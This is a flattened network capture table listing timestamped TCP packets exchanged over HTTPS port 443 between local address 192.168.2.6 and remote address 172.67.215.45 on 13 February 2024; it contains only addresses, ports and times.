                                                                  Feb 13, 2024 21:13:54.706655979 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.706703901 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.706710100 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.706727982 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.707488060 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.708376884 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.708390951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.708456039 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.708456039 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.708462954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.708508015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.727358103 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.727389097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.727452993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.727459908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.727488995 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.727595091 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.727976084 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.728003025 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.728070021 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.728070021 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.728076935 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.728147030 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.729847908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.729872942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.729957104 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.729957104 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.729969025 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.730052948 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.731698990 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.731720924 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.731785059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.731785059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.731794119 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.731993914 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.732641935 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.732662916 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.732697010 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.732707977 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.732748032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.732748032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.734554052 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.734577894 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.734610081 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.734623909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.734662056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.734662056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.735938072 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.735955954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.735996008 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.736002922 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.736037970 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.736037970 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.737293005 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.737310886 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.737344980 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.737356901 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.737392902 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.737477064 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.738616943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.738637924 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.738701105 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.738701105 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.738709927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.738888025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.740303040 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.740319967 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.740379095 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.740379095 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.740386009 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.740427017 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.741393089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.741410017 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.741471052 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.741471052 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.741477966 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.741544962 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.743129015 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.743146896 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.743201017 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.743207932 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.743273973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.744882107 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.744899988 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.744949102 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.744954109 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.744991064 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.746043921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.746062994 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.746105909 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.746119022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.746233940 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.747208118 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.747231007 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.747287035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.747287035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.747292042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.747334003 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.748960018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.748980999 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.749094963 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.749102116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.749219894 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.750848055 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.750864983 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.750905037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.750920057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.750955105 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.752207994 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.752223969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.752257109 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.752271891 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.752301931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.752301931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.753768921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.753787041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.753848076 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.753848076 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.753854036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.753901958 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.755239010 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.755259037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.755316019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.755316019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.755321980 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.755388975 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.757410049 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.757438898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.757482052 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.757491112 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.757522106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.757522106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.759349108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.759370089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.759404898 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.759423018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.759443998 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.759474993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.761584044 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.761607885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.761663914 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.761663914 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.761672020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.761733055 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.763637066 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.763662100 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.763693094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.763714075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.763725042 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.763748884 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.765944004 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.765969038 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.766030073 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.766030073 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.766038895 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.766082048 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.768074036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.768098116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.768126011 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.768140078 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.768157959 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.768177032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.770133018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.770154953 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.770215034 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.770215034 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.770220995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.770287037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.772469044 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.772492886 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.772550106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.772550106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.772556067 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.772588015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.774219036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.774243116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.774292946 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.774308920 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.774350882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.774350882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.776206017 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.776228905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.776289940 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.776289940 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.776302099 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.776338100 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.778251886 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.778274059 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.778331995 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.778342962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.778367996 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.778409958 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.780119896 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.780139923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.780195951 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.780208111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.780246019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.781941891 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.781965971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.781999111 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.782017946 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.782048941 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.782048941 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.783421040 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.783436060 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.783495903 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.783507109 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.783577919 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.785007954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.785022974 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.785068035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.785089016 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.785245895 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.786739111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.786753893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.786828041 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.786839962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.786936998 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.788117886 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.788132906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.788176060 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.788192034 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.788227081 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.789679050 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.789699078 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.789905071 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.789912939 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.790045977 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.791244984 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.791261911 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.791306019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.791316032 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.791362047 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.792857885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.792872906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.792936087 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.792936087 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.792943001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.792975903 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.794527054 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.794543028 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.794584036 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.794598103 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.794644117 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.796241045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.796257019 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.796304941 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.796319008 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.796735048 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.797581911 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.797619104 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.797661066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.797677040 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.797837019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.799218893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.799235106 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.799297094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.799297094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.799304962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.799515009 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.800827026 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.800842047 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.800889015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.800904036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.801040888 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.802961111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.802975893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.803023100 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.803030014 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.803133011 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.804240942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.804256916 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.804303885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.804315090 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.804373980 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.805280924 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.805294991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.805352926 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.805361032 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.805404902 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.807019949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.807034969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.807176113 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.807184935 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.807337999 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.808607101 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.808621883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.808758974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.808765888 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.808846951 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.810471058 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.810486078 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.810561895 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.810569048 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.810611963 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.811770916 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.811784983 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.811841965 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.811850071 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.811894894 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.813257933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.813271046 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.813374043 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.813380957 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.813421965 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.814980030 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.814992905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.815093040 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.815100908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.815275908 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.816770077 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.816782951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.816831112 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.816839933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.816869974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.816869974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.817951918 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.817965984 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.818006992 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.818022013 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.818052053 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.818052053 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.819694042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.819709063 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.819762945 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.819777012 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.819890976 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.821249962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.821264982 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.821355104 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.821355104 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.821362972 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.821468115 CET49701443192.168.2.6172.67.215.45
